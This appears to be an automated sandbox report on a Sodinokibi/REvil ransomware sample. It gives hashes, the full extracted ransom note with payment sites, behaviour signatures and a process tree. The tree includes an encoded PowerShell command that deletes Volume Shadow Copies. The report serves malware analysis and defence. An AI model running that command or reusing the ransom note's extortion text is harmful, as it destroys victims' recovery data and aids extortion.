Analysis

  • max time kernel
    151s
  • max time network
    162s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    30-01-2022 07:56

General

  • Target

    22d91795b7fc302eac6b2ee9a582ab7de1e29028d313a1fd34ff64f8f5baa0a3.exe

  • Size

    133KB

  • MD5

    fa3cbd224ae012ebbef336f49cf83c77

  • SHA1

    7071091b8f7e0387a0d0e643665acb12d5eab211

  • SHA256

    22d91795b7fc302eac6b2ee9a582ab7de1e29028d313a1fd34ff64f8f5baa0a3

  • SHA512

    fee1a5408ea269d6b338d338cbaae90f32a90de6061a2e8ed2bf216e9496a7e475ffea8c08c7ceb5022e36595eb403eb8695a87b2b08d316a24662d72940fd53

Malware Config

Extracted

Path

C:\49sbjcp-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 49sbjcp. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/A9B4D38C6EA2A2B8 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/A9B4D38C6EA2A2B8 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: ixl5OYEZTfarkuUGpM/5/Ky6dHsvNURGf4VtG/5Y/mCx4K2TQkos+2XXbYbdWCWD 6yxGgbmy1Bs2aO1EBHWaRIRvDH7MzIIQkq5ZO5unYD856AUMjdSO74DEF9XN4c6w UhWD3p79ctBV4iolLqgqecVsEWZBUhGmveMT1MklfaFSheMtq34mpUokmJFawsln qbiO4fdg/D1jDdCH/KuOCdRtTaMIh3UpSphz9chdTmF9Tct98qnheRPTFvgVFgom qZyGpgEq5mQ9pVo4QFpCgpYRkWHJGcRxC8POCT+kfBiEcfP+Ssjgfv9uLqaw9Rys oQUqsYsqcjgNZC8OMqPJ4sUzcQe1SrVDUIwle+wmjRMEd9fLKZTZw2rkQ6nnpUnA NnJ4kyhf/52mBsV5eDdYjn/hzxXGPhtyZILbSJFVGFmUGpwr0nL1743TGkdCdkEj MkUsqP+TZUcQRcHBXweh6uDp7QQUVoIHzqcTAUUnP7Alv5VCReYVUIM2UeZnilZF gkz8g7iNGBXQXlaW9KRFVxDzih/dguNZqdFbYkQKNunMIxFgekqOznOLx/XvamRn olHIn0pPNVZeymKntnWvZFDuro+0JonC5CjUU+pI0O/AIOfAsU07yBECvy5KeGK8 hlSNrHHeW9qw3PlX3Xds3c/7Xrni3Yn3bfBoASwbbIpTjoxIT5MAiAwOo1G7ncdc 7lQWvXn3l67tpmeJ/EXE9W+lvbIWYbDfImWQsJW1eWIuPUeE0oDn/WesFU6IYNuV rR9iKvtaAIjuBIbL2d4eJBZ3Tq3BHJGcj9Yct0wjjc5aUHQ4NKT/MRn5zXSsJaw+ sOwcpHCM8QK/fRIlo+FQQK8WdtOAhRwJzPj+GImCudX0Mr3HdW6DecplZMLJjJSm d0O5d3uSN69WBTNoLgxQr8daBLU+E5livGBLxfprWB6N4xv0Sf0T4NgMVwfzq25A x+o7s6EmPUfYYb5L+hN4MRbSGSBsrwL37pPP+evX/UA7Po4SQliv+kpdQ6zCNhWl 9mK/LYEsmjoTpib0Tn0UiLRTHA8qwCpttfm918t5WLmU80ZhuAXy9qmu537Zo2En urqnp+mB5AqoQz0s2s0s8oJMsACdBx3pHDxp42CJd2aAeUxZ2c12bjODltnlS4Ky GNuNHRYLm3DVVEER5JkhfpdemtdCSSyOO0KlkhXtZpuH2k3Kywzwcg+Aw3pAUfhE 7KEGU/6PZqUBAA8oif+QYs0LwZIVUcoOWsbIw+VVHz2rJoCRdNhTR7C/UF4mOZya rQfDXaMCA8+hvUwgbAnQhWAFazQLeH9JlyQ= ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/A9B4D38C6EA2A2B8

http://decryptor.cc/A9B4D38C6EA2A2B8

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Modifies extensions of user files 6 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 18 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\22d91795b7fc302eac6b2ee9a582ab7de1e29028d313a1fd34ff64f8f5baa0a3.exe
    "C:\Users\Admin\AppData\Local\Temp\22d91795b7fc302eac6b2ee9a582ab7de1e29028d313a1fd34ff64f8f5baa0a3.exe"
    1⤵
    • Modifies extensions of user files
    • Adds Run key to start application
    • Enumerates connected drives
    • Drops file in System32 directory
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1612
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:684
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:1132
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1488

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/684-56-0x000007FEFC4A1000-0x000007FEFC4A3000-memory.dmp

      Filesize

      8KB

    • memory/684-58-0x00000000025A0000-0x00000000025A2000-memory.dmp

      Filesize

      8KB

    • memory/684-59-0x00000000025A2000-0x00000000025A4000-memory.dmp

      Filesize

      8KB

    • memory/684-60-0x00000000025A4000-0x00000000025A7000-memory.dmp

      Filesize

      12KB

    • memory/684-57-0x000007FEF3510000-0x000007FEF406D000-memory.dmp

      Filesize

      11.4MB

    • memory/684-61-0x00000000025AB000-0x00000000025CA000-memory.dmp

      Filesize

      124KB

    • memory/1612-55-0x0000000076921000-0x0000000076923000-memory.dmp

      Filesize

      8KB